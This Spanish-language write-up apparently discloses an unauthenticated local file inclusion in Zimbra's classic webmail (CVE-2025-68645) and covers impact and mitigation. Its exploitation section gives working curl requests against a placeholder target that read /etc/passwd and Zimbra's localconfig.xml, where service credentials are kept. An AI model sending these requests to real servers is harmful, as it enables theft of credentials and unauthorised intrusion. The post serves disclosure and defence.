📌 Resumen
Este documento describe una vulnerabilidad de Inclusión de Archivos Local (LFI) que afecta a Zimbra Collaboration Suite.
El problema surge por un manejo inadecuado del siguiente parámetro:
/h/*?javax.servlet.include.servlet_path=
Esto permite que un usuario no autenticado acceda a recursos internos de la aplicación.
🔍 Detalles de la Vulnerabilidad
- Tipo: Inclusión de Archivos Local (LFI)
- Acceso: No autenticado
- Componente afectado: Webmail (Interfaz Clásica)
- Vector de ataque: Manipulación de solicitudes HTTP
🧪 Verificación Inicial
Solicitud de prueba:
curl -k "https://TARGET/h/rest?javax.servlet.include.servlet_path=/WEB-INF/web.xml"
▶️ Demo:
✅ Resultado
- Archivo interno recuperado exitosamente
- Confirma manejo inadecuado de entrada
⚙️ Comportamiento del Endpoint
Múltiples endpoints procesan el parámetro vulnerable de manera diferente.
Ejemplo:
/h/printcalendar?javax.servlet.include.servlet_path=...
Observaciones:
- Comportamiento de acceso a archivos más consistente
- Mejor confiabilidad de respuesta en comparación con
/h/rest
🚧 Consideración sobre TLS
Problema
SSL: certificate subject name does not match target host
Solución alternativa
curl -k "https://TARGET/..."
🚀 Ejemplos de Explotación
📂 Acceder a Recurso Web Interno
curl -k "https://TARGET/h/printcalendar?javax.servlet.include.servlet_path=/WEB-INF/web.xml"
📂 Intentar Acceder a Archivos del Sistema
curl -k "https://TARGET/h/printcalendar?javax.servlet.include.servlet_path=/etc/passwd"
🔐 Acceder a la Configuración de la Aplicación
curl -k "https://TARGET/h/printcalendar?javax.servlet.include.servlet_path=/opt/zimbra/conf/localconfig.xml"
Posible Exposición:
- Credenciales de servicios
- Configuración interna
- Detalles de la infraestructura
🧠 Impacto
La explotación exitosa puede llevar a:
- Divulgación de archivos de configuración sensibles
- Exposición de servicios internos y arquitectura
- Fuga de credenciales
- Mayor riesgo de compromisos adicionales
🛡️ Mitigación
-
Actualizar Zimbra a versiones parcheadas
-
Restringir el acceso a los endpoints vulnerables
-
Monitorear registros en busca de parámetros sospechosos:
javax.servlet.include.servlet_path
-
Implementar reglas WAF para bloquear patrones maliciosos
💡 Conclusiones Clave
- Fallos en la validación de entrada pueden exponer recursos internos
- Diferentes endpoints pueden comportarse de manera inconsistente
- Los archivos de configuración a menudo contienen información crítica
- La detección temprana reduce significativamente el riesgo
🏴 Conclusión
- Vulnerabilidad confirmada: CVE-2025-68645
- La explotación permite acceso no autorizado a archivos
- Se recomienda encarecidamente una remediación inmediata
🔐 La Seguridad Importa